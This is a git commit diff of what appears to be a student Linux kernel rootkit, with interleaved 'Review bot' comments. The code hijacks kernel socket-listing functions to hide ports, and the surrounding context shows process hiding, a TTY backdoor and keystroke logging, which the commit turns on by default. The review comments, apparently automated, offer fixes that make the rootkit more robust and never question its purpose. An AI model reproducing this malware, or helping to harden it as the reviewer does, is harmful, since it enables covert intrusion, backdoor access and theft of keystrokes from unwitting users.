commit 8ab6f96556309dbc01e49f9be723d584fcc506ac
parent 005fd32ac661d6d886fa818a5932b65ee7becb63
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 13 Dec 2020 02:50:43 +0100
refactors code
Diffstat:
5 files changed, 27 insertions(+), 29 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -188,7 +188,7 @@ handle_tcphide(unsigned long arg)
if (!sarg) {
// TODO also remove all sockets (tcp & udp) that are currently being hidden
rootkit.hiding_sockets = 0;
- unhook_show();
+ unhide_sockets();
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
unhide_port((port_t)-sarg, tcp4);
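Review bot: The `!sarg` branch calls `unhide_sockets()` unconditionally, while the `sarg > 0` branch of the same function guards `hide_sockets()` with `if (!rootkit.hiding_sockets)`; if hiding was never switched on, the unhook presumably writes back `tcp4_seq_show` and friends that `hide_sockets()` never filled in. Guard it symmetrically, `if (rootkit.hiding_sockets) unhide_sockets();`, before clearing the flag. The same branch in handle_udphide's hunk below has the opposite statement order (unhook first, clear the flag second) and lacks the TODO kept here, so the two handlers should share one helper rather than diverge further. handle_tcphide's body continues outside the hunk.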
@@ -196,7 +196,7 @@ handle_tcphide(unsigned long arg)
DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
- hook_show();
+ hide_sockets();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
@@ -214,7 +214,7 @@ handle_udphide(unsigned long arg)
long sarg = (long)arg;
if (!sarg) {
- unhook_show();
+ unhide_sockets();
rootkit.hiding_sockets = 0;
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
@@ -223,7 +223,7 @@ handle_udphide(unsigned long arg)
DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
- hook_show();
+ hide_sockets();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
hide_port((port_t)sarg, udp4);
diff --git a/src/g7.c b/src/g7.c
@@ -45,7 +45,7 @@ rootkit_t rootkit = {
.hiding_open = true,
.hiding_pids = true,
.hiding_sockets = true,
- .logging_input = false,
+ .logging_input = true,
.backdoor = BD_TTY,
};
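Review bot: Flipping the default `.logging_input` from false to true is a behaviour change, not a refactor, and the commit message ("refactors code") does not mention it; with this default, init_hooks calls `log_input("127.0.0.1", "5000")` at load. Split it into its own commit with a one-line rationale, or revert it here. A comment on the field, `/* default: input logging enabled at load */`, would make the new default visible to anyone reading rootkit_t.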
diff --git a/src/hook.c b/src/hook.c
@@ -84,6 +84,9 @@ init_hooks(void)
if (rootkit.hiding_pids)
hide_pids();
+ if (rootkit.hiding_sockets)
+ hide_sockets();
+
if (rootkit.backdoor == BD_READ)
backdoor_read();
else if (rootkit.backdoor == BD_TTY)
@@ -91,9 +94,6 @@ init_hooks(void)
if (rootkit.logging_input)
log_input("127.0.0.1", "5000");
-
- if (rootkit.hiding_sockets)
- hook_show();
}
void
@@ -113,14 +113,14 @@ remove_hooks(void)
unhide_pids();
}
+ if (rootkit.hiding_sockets)
+ unhide_sockets();
+
if (rootkit.backdoor != BD_OFF)
unbackdoor();
if (rootkit.logging_input)
unlog_input();
-
- if (rootkit.hiding_sockets)
- unhook_show();
}
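Review bot: remove_hooks now tears down in the same order init_hooks sets up (pids, sockets, backdoor, logging) rather than the reverse; teardown conventionally unwinds in reverse so later hooks that may depend on earlier state are removed first. The hooks here look independent, so this is a style point, but keeping remove_hooks as the mirror image of init_hooks is cheaper to keep correct as hooks are added. Both enclosing functions start outside their hunks.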
void
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -28,24 +28,24 @@ static int g7_udp4_seq_show(struct seq_file *, void *);
static int g7_udp6_seq_show(struct seq_file *, void *);
void
-hook_show(void)
+hide_sockets(void)
{
- tcp4_seq_show
+ tcp4_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show;
- tcp6_seq_show
+ tcp6_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show;
- udp4_seq_show
+ udp4_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show;
- udp6_seq_show
+ udp6_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show;
disable_protection();
((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
= (void *)g7_tcp4_seq_show;
-
+
((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show
= (void *)g7_tcp6_seq_show;
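Review bot: Every `kallsyms_lookup_name(...)` result is cast and dereferenced on the spot, both in the `->show` reads at the top and in the writes after `disable_protection()`, so a symbol that is not found becomes a null dereference in kernel context, and each symbol is looked up twice. Resolve each once into a local and bail before touching anything, e.g. `struct seq_operations *tcp4 = (void *)kallsyms_lookup_name("tcp4_seq_ops"); if (!tcp4) return;` and likewise for the other three. The function also saves whatever `->show` currently holds, so a second call records `g7_tcp4_seq_show` as the "original"; today only the callers' `hiding_sockets` checks prevent that, and the guard belongs inside `hide_sockets()` itself. The body continues past the hunk.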
@@ -54,11 +54,11 @@ hook_show(void)
((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show
= (void *)g7_udp6_seq_show;
- enable_protection();
+ enable_protection();
}
void
-unhook_show(void)
+unhide_sockets(void)
{
disable_protection();
((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
@@ -75,7 +75,7 @@ unhook_show(void)
enable_protection();
}
-void
+void
hide_port(port_t port, proto proto)
{
add_port_to_list(hidden_ports_tail, port, proto);
@@ -97,7 +97,7 @@ port_list_t_ptr
find_port_in_list(port_list_t_ptr head, port_t port, proto proto)
{
port_list_t_ptr i;
- for (i = head; i; i = i->next)
+ for (i = head; i; i = i->next)
if (i->port == port && i->proto == proto)
return i;
@@ -152,7 +152,7 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto proto)
static int
g7_tcp4_seq_show(struct seq_file *seq, void *v)
{
- //SEQ_START_TOKEN is used to indicate that a
+ //SEQ_START_TOKEN is used to indicate that a
//header will be returned first
if(v == SEQ_START_TOKEN)
return tcp4_seq_show(seq, v);
@@ -186,7 +186,7 @@ g7_tcp6_seq_show(struct seq_file *seq, void *v)
if(list_contains_port(&hidden_ports, src, tcp6)
|| list_contains_port(&hidden_ports, dst, tcp6))
return 0;
-
+
return tcp6_seq_show(seq, v);
}
@@ -226,4 +226,4 @@ g7_udp6_seq_show(struct seq_file *seq, void *v)
return 0;
return udp6_seq_show(seq, v);
-}
-\ No newline at end of file
+}
diff --git a/src/sockhide.h b/src/sockhide.h
@@ -20,8 +20,8 @@ typedef struct port_list {
extern port_list_t hidden_ports;
-void hook_show(void);
-void unhook_show(void);
+void hide_sockets(void);
+void unhide_sockets(void);
void hide_port(port_t, proto);
void unhide_port(port_t, proto);
@@ -31,4 +31,4 @@ port_list_t_ptr find_port_in_list(port_list_t_ptr, port_t, proto);
port_list_t_ptr add_port_to_list(port_list_t_ptr, port_t, proto);
port_list_t_ptr remove_port_from_list(port_list_t_ptr, port_t, proto);
-#endif //_GROUP7_SOCKHIDE_H
-\ No newline at end of file
+#endif //_GROUP7_SOCKHIDE_H